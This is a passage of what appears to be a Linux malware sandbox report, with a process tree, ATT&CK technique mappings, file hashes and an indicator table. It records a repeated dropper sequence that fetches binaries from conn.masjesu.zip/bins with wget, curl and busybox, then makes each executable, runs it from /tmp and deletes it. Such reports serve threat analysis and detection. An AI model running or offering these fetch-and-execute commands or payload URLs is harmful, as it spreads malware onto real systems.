chmod 777 NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
2⤵
- File and Directory Permissions Modification
PID:964

/tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
./NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
2⤵
- Executes dropped EXE
PID:965

/bin/rm
rm NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
2⤵
PID:967

/usr/bin/wget
wget http://conn.masjesu.zip/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
2⤵
PID:968

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:969

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
2⤵
PID:971

/bin/chmod
chmod 777 IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
2⤵
- File and Directory Permissions Modification
PID:972

/tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
./IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
2⤵
- Executes dropped EXE
PID:973

/bin/rm
rm IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
2⤵
PID:975

/usr/bin/wget
wget http://conn.masjesu.zip/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
2⤵
PID:976

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:977

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
2⤵
- System Network Configuration Discovery
PID:979

/bin/chmod
chmod 777 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
2⤵
- File and Directory Permissions Modification
PID:980

/tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
./32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
2⤵
- Executes dropped EXE
PID:981

/bin/rm
rm 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
2⤵
PID:983

/usr/bin/wget
wget http://conn.masjesu.zip/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
2⤵
- System Network Configuration Discovery
PID:984

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:985

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
2⤵
- System Network Configuration Discovery
PID:987

/bin/chmod
chmod 777 wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
2⤵
- File and Directory Permissions Modification
PID:988

/tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
./wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
2⤵
- Executes dropped EXE
PID:989

/bin/rm
rm wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
2⤵
PID:991

/usr/bin/wget
wget http://conn.masjesu.zip/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
2⤵
- System Network Configuration Discovery
PID:992

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:993

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
2⤵
- System Network Configuration Discovery
PID:995

/bin/chmod
chmod 777 UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
2⤵
- File and Directory Permissions Modification
PID:996

/tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
./UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
2⤵
- Executes dropped EXE
PID:997

/bin/rm
rm UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
2⤵
PID:999

/usr/bin/wget
wget http://conn.masjesu.zip/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
2⤵
- System Network Configuration Discovery
PID:1000

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
2⤵
- System Network Configuration Discovery
PID:1003

/bin/chmod
chmod 777 IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
2⤵
- File and Directory Permissions Modification
PID:1004

/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
./IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
2⤵
- Executes dropped EXE
PID:1005

/bin/rm
rm IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
2⤵
PID:1006

/usr/bin/wget
wget http://conn.masjesu.zip/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
2⤵
- System Network Configuration Discovery
PID:1007

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1008

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
2⤵
PID:1010

/bin/chmod
chmod 777 WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
2⤵
- File and Directory Permissions Modification
PID:1011

/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
./WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
2⤵
- Executes dropped EXE
PID:1012

/bin/rm
rm WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
2⤵
PID:1013

/usr/bin/wget
wget http://conn.masjesu.zip/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
2⤵
- System Network Configuration Discovery
PID:1014

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1015

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
2⤵
- System Network Configuration Discovery
PID:1017

/bin/chmod
chmod 777 X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
2⤵
- File and Directory Permissions Modification
PID:1018

/tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
./X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
2⤵
- Executes dropped EXE
PID:1019

/bin/rm
rm X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
2⤵
PID:1021

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Linux and Mac File and Directory Permissions Modification

1

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

1

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs

Filesize
16B

MD5
7689ca8c5bc85cf6b78ef89323d4df6a

SHA1
a1392ec3b571b3de167f0b9a5dadab4f14a2db76

SHA256
17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5

SHA512
40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471

Download Submit

ioc	pid	process
/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7	736	IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs	743	WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
/tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame	763	X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
/tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo	797	UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
/tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l	810	Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
/tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX	820	Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
/tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU	839	0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
/tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb	864	h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
/tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu	872	NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
/tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt	880	WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
/tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu	888	gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
/tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS	895	32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
/tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM	903	wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
/tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u	911	IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
/tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX	918	Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
/tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l	926	Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
/tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt	934	WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
/tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu	942	gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
/tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU	950	0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
/tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb	957	h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
/tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu	965	NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
/tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u	973	IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
/tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS	981	32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
/tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM	989	wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
/tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo	997	UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7	1005	IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs	1012	WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
/tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame	1019	X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads